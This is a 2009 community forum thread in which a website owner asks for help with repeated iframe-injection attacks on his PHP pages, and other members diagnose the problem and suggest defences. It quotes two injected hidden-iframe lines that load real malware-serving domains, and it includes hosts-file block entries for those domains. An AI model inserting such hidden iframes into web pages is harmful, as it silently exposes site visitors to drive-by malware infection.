Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for
My websites are under attack!
Topic Options
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page
- Plusnet Community
- :
- Forum
- :
- Help with my Plusnet services
- :
- Everything else
- :
- My websites are under attack!
My websites are under attack!
09-10-2009 9:14 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
I have two websites I'm currently working on.
They are hosted on PAYH and one of them is a subdomain of the other.
I'm not using any third party script.
PAYH have had a look at the server log and confirmed that there is only my IP address that has accessed it.
I have changed my FTP password frequently
My site is very heavily PHP based but I use MS Frontpage to design the html elements and FTP the files to the server
The following line of code is being inserted into the first line of my index, login, news, home pages
on another occasion last week, the line of code was
I have now learned to keep checking file manager in my Plesk CP to make sure this code has not been inserted. If it is there then a visit to my site will cause my PC to shut down and restart full of adware and viruses.
I have cleaned my pc with combofix, AVG Anti-RootKit, spybot S & D, windows defender, McAffee AV (all with latest updates) but this problem keeps coming back.
My conclusion is that my own pc is doing the damage during the FTP upload but I cannot find the source of the problem.
Can anyone help and advise me how to fix this problem?
They are hosted on PAYH and one of them is a subdomain of the other.
I'm not using any third party script.
PAYH have had a look at the server log and confirmed that there is only my IP address that has accessed it.
I have changed my FTP password frequently
My site is very heavily PHP based but I use MS Frontpage to design the html elements and FTP the files to the server
The following line of code is being inserted into the first line of my index, login, news, home pages
<iframe src="http://keymydomains.com/" width="1" height="2"></iframe>
on another occasion last week, the line of code was
<iframe src="http://npanelsrv.info/" width="1" height="2"></iframe>
I have now learned to keep checking file manager in my Plesk CP to make sure this code has not been inserted. If it is there then a visit to my site will cause my PC to shut down and restart full of adware and viruses.
I have cleaned my pc with combofix, AVG Anti-RootKit, spybot S & D, windows defender, McAffee AV (all with latest updates) but this problem keeps coming back.
My conclusion is that my own pc is doing the damage during the FTP upload but I cannot find the source of the problem.
Can anyone help and advise me how to fix this problem?
Message 1 of 7
(3,321 Views)
6 REPLIES 6
Re: My websites are under attack!
09-10-2009 10:49 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Just done a google on keymydomains.com and got this:
[quote="Norton Safe Web"]
av.org
Summary
•Computer Threats: 2
•Identity Threats: 0
•Annoyance factors: 0
Total threats on this site: 2
•Community Reviews: 0
The Norton rating is a result of Symantec's automated analysis system.
[Snip]
Web Site Location United States of America
[Snip]
Viruses
Threat Name: Trojan.Pidief.C
Threat Name: Trojan.Malscript!html
So you have been to a site with viruses on it! Learn more from the link above.
Hope this helps.
P.S.
Add the domains:
av.org
keymydomains.com
npanelsrv.info
To your hosts file like this:
127.0.0.1 av.org
127.0.0.1 keymydomains.com
127.0.0.1 npanelsrv.info
P.P.S.
Use Sandboxed to protekt your Browser
[quote="Norton Safe Web"]
av.org
Summary
•Computer Threats: 2
•Identity Threats: 0
•Annoyance factors: 0
Total threats on this site: 2
•Community Reviews: 0
The Norton rating is a result of Symantec's automated analysis system.
[Snip]
Web Site Location United States of America
[Snip]
Viruses
Threat Name: Trojan.Pidief.C
Threat Name: Trojan.Malscript!html
So you have been to a site with viruses on it! Learn more from the link above.
Hope this helps.
P.S.
Add the domains:
av.org
keymydomains.com
npanelsrv.info
To your hosts file like this:
127.0.0.1 av.org
127.0.0.1 keymydomains.com
127.0.0.1 npanelsrv.info
P.P.S.
Use Sandboxed to protekt your Browser
Message 2 of 7
(648 Views)
Re: My websites are under attack!
09-10-2009 10:53 AM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
There's a discussion of what to do about iframe injection attacks at http://www.webhostingtalk.com/showthread.php?t=887539
Good luck
Message 3 of 7
(648 Views)
Re: My websites are under attack!
09-10-2009 3:35 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
As Ponds has alluded to, it would seem that you're being subjected to an iFrame injection attack. Given what you've said about changing your passwords, the root cause is much more likely to be due to vulnerabilities in one or more of your PHP scripts.
Bob Pullen
Plusnet Product Team
If I've been helpful then please give thanks ⤵
Message 4 of 7
(648 Views)
Re: My websites are under attack!
09-10-2009 5:05 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Thanks for your help you guys
The very first time there was an indication of a problem was when i went to one of my regular message boards. It's a 'freeforums' crown green bowling message board but because it's free it's full of ad-banners etc. Loads of porn popups suddenly appeared and my pc shutdown and restarted. My PC was then infected with Anti-Virus 2009 and a million other malware problems which I have since attempted to fix with the methods described in my original post.
Ever since then my own site has had these iframe injection attacks so I must agree with what Midnight Caller said about visiting a site with viruses. Staying with Midnight Caller, I don't know how to add those domains to my hosts file. I asked PAYH if I could exclude ISP's but they can't because it's a shared server. I will look into sandboxed.
I will also follow the advice from Ponds and Bob to look into those PHP script vulnerabilities. I'm learning PHP so there probably are weaknesses in my code
In the Logs area of my plesk control panel, i can see the log of my primary pages been edited in the early hours of the morning by an IP address which isn't mine.
I hope the new info I've given has helped describe the problem better and enable you to confirm your suspicions about the possible cause
Many thanks
Brian
The very first time there was an indication of a problem was when i went to one of my regular message boards. It's a 'freeforums' crown green bowling message board but because it's free it's full of ad-banners etc. Loads of porn popups suddenly appeared and my pc shutdown and restarted. My PC was then infected with Anti-Virus 2009 and a million other malware problems which I have since attempted to fix with the methods described in my original post.
Ever since then my own site has had these iframe injection attacks so I must agree with what Midnight Caller said about visiting a site with viruses. Staying with Midnight Caller, I don't know how to add those domains to my hosts file. I asked PAYH if I could exclude ISP's but they can't because it's a shared server. I will look into sandboxed.
I will also follow the advice from Ponds and Bob to look into those PHP script vulnerabilities. I'm learning PHP so there probably are weaknesses in my code

In the Logs area of my plesk control panel, i can see the log of my primary pages been edited in the early hours of the morning by an IP address which isn't mine.
I hope the new info I've given has helped describe the problem better and enable you to confirm your suspicions about the possible cause
Many thanks
Brian
Message 5 of 7
(648 Views)
Re: My websites are under attack!
09-10-2009 8:33 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
SoulBriski, you can download a copy of my hosts files Here put the hosts file in a folder with the program mvps.bat and the program stop.and.disable.dnscache.bat to update your hosts file double click on mvps.bat then run stop.and.disable.dnscache.bat wich will stop your computer slowing down, with my hosts file been so big, you can edit the hosts file with Notepad, you can add and remove addresses from the hosts file.
Right click on them and save target as, to a folder on your computer.
I hope this helps.
P.S.
You may want to download a program that kils Flash cookies from Here, Right click on them and save target as, to a folder on your computer then double click on flashblock.bat and follow the instructions.
Pleas see [Security] - Hidden Flash cookies for more information.
Right click on them and save target as, to a folder on your computer.
I hope this helps.
P.S.
You may want to download a program that kils Flash cookies from Here, Right click on them and save target as, to a folder on your computer then double click on flashblock.bat and follow the instructions.
Pleas see [Security] - Hidden Flash cookies for more information.
Message 6 of 7
(648 Views)
Re: My websites are under attack!
09-10-2009 8:58 PM
- Mark as New
- Bookmark
- Subscribe
- Subscribe to RSS Feed
- Highlight
- Report to Moderator
Firstly - i'm not an expert at php - but I have been warned off using some php scripts you find on the net - as some have security holes ??.
I struggled with php until I read David Powers books on the subject - and he explains some of these security issues and ways to avoid trouble.
http://foundationphp.com/books.php
I struggled with php until I read David Powers books on the subject - and he explains some of these security issues and ways to avoid trouble.
http://foundationphp.com/books.php
Message 7 of 7
(648 Views)
Topic Options
- Subscribe to RSS Feed
- Mark Topic as New
- Mark Topic as Read
- Float this Topic for Current User
- Bookmark
- Subscribe
- Printer Friendly Page
- Plusnet Community
- :
- Forum
- :
- Help with my Plusnet services
- :
- Everything else
- :
- My websites are under attack!